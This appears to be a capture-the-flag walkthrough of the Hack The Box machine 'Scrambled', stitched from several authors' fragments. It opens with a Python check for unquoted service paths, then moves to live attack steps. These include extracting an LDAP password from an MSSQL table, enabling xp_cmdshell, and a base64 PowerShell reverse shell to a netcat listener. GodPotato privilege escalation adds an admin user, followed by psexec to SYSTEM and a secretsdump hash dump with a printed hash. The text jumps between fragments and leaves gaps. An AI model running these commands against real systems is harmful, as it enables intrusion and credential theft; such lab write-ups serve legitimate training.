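def audit_image_path(image_path: str) -> ImagePathFinding:
    """Reproduce the 'No quotes and Space detected' check.

    For an unquoted path containing spaces, CreateProcess tries each
    space-delimited prefix with '.exe' appended before it reaches the real
    executable. If a low-privileged user can write to the directory of one of
    those prefixes, the service would start the wrong binary. The function
    reports those prefixes and a quoted ImagePath that removes the ambiguity.
    It does not check directory ACLs; only a writable prefix directory makes
    the finding exploitable (C:\\ itself is not writable by default)."""
    path = image_path.strip()
    if path.startswith('"'):
        # Quoted path: the executable boundary is explicit, nothing to do.
        end = path.find('"', 1)
        binary, args = path[1:end], path[end + 1:].strip()
        return ImagePathFinding(image_path, binary, args, [], path)

    tokens = path.split(" ")
    # The intended executable ends at the first token with an .exe suffix;
    # everything after it is arguments (e.g. the "4411" port above).
    exe_idx = next((i for i, t in enumerate(tokens) if t.lower().endswith(".exe")),
                   len(tokens) - 1)
    binary = " ".join(tokens[: exe_idx + 1])
    args = " ".join(tokens[exe_idx + 1:])
    lookups = [" ".join(tokens[:i]) + ".exe" for i in range(1, exe_idx + 1)]
    remediated = f'"{binary}"' + (f" {args}" if args else "")
    return ImagePathFinding(image_path, binary, args, lookups, remediated)


SAMPLE_IMAGE_PATHS = [
    r"C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411",  # from winPEAS above
    r'"C:\Program Files\Vendor\Agent Service\agent.exe" --service',              # constructed: already quoted
    r"C:\Windows\System32\svchost.exe -k netsvcs",                                # constructed: spaces only in args
    r"C:\Tools\My Backup Tool\backup.exe",                                        # constructed: two spaces in path
]

if __name__ == "__main__":
    for p in SAMPLE_IMAGE_PATHS:
        f = audit_image_path(p)
        if f.unquoted_with_spaces:
            print(f"[RISK] {p}\n       tried first: {f.lookups_before_binary}\n       fix: {f.remediated}")
        else:
            print(f"[ok]   {p}")
```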
Check db for user passwords
> sqlcmd -q "select name from sys.databases"
Check tables in ScrambleHR
> sqlcmd -q "use ScrambleHR;select table_name from information_schema.tables"
# found
Employees
UserImport
Timesheets
Check the table contents of UserImport; found user MiscSvc with an LDAP credential
> sqlcmd -q "use ScrambleHR;select db_name();select * from UserImport;"
MiscSvc is an IT user, which means it has the CanPSRemote permission, but evil-winrm doesn't work.
In order to get a reverse shell, you can use the "PowerShell #3 (Base64)" payload from revshells.com.
SQL> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAG[...]
kali@kali:~/Documents/HTB/Scrambled$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.11.168] 57867
whoami
scrm\sqlsvc
PS C:\Windows\system32>
Now we need to create another reverse shell in order to become MiscSvc and obtain the user flag.
Wh04m1 got root blood on Scrambled using this technique. This post on MSSQL Tips talks about how to read a file with MSSQL using the BULK option, which was added in SQL Server 2005. Their example query is:
OPENROWSET returns a single column named BulkColumn. MyFile is a correlation name, which isn't really important here other than that it must exist; it doesn't really matter what I put there.
OPENROWSET, when used with the BULK provider, takes a file path and one of three keywords:
To get to a place where I could run RoguePotato, I’ll need to be executing with the SeImpersonatePrivilege. I’m most likely to find this through the MSSQL service.
To run commands via MSSQL, I’ll use the xp_cmdshell stored procedure.
RoguePotato and JuicyPotato will work on Scrambled, but I'll use this opportunity to show GodPotato.
┌──(puck㉿kali)-[~/htb/scrambled]
└─$ impacket-mssqlclient -k dc1.scrm.local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)> SELECT * from ScrambleHR.dbo.UserImport;
LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups
-------- ----------------- ---------- --------------- -------------
MiscSvc ScrambledEggs9900 scrm.local 90 0
SQL (SCRM\administrator dbo@master)> whoami /priv
ERROR(DC1): Line 1: Incorrect syntax near '/'.
SQL (SCRM\administrator dbo@master)> whoami
ERROR(DC1): Line 1: Could not find stored procedure 'whoami'.
SQL (SCRM\administrator dbo@master)> xp_cmdshell whoami
ERROR(DC1): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (SCRM\administrator dbo@master)> EXECUTE sp_configure 'show advanced options', 1
INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator dbo@master)> RECONFIGURE
SQL (SCRM\administrator dbo@master)> EXECUTE sp_configure 'xp_cmdshell', 1
INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator dbo@master)> RECONFIGURE
SQL (SCRM\administrator dbo@master)> xp_cmdshell whoami
output
-----------
scrm\sqlsvc
NULL
SQL (SCRM\administrator dbo@master)> xp_cmdshell C:\\programdata\\rcat_10.10.14.2_9001.exe
rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.168] 58416
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Windows\system32> cd c:\programdata
cd c:\programdata
PS C:\programdata> .\god.exe -cmd "net user puck Start123 /add"
PS C:\programdata> .\god.exe -cmd "net localgroup Administrators puck /add"
impacket-psexec scrm.local/puck:Start123@dc1.scrm.local -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Requesting shares on dc1.scrm.local.....
[*] Found writable share ADMIN$
[*] Uploading file mwRrJIMc.exe
[*] Opening SVCManager on dc1.scrm.local.....
[*] Creating service BSRw on dc1.scrm.local.....
[*] Starting service BSRw.....
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[!] Press help for extra shell commands
[-] CCache file is not found. Skipping...
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
Get the same hashes with secretsdump:
impacket-secretsdump scrm.local/puck:Start123@dc1.scrm.local -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x33d8cbadba9e3f89bd60e5bfe64743e3
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ebb16eb3b0b1d0bea029cab7d18e534c:::
...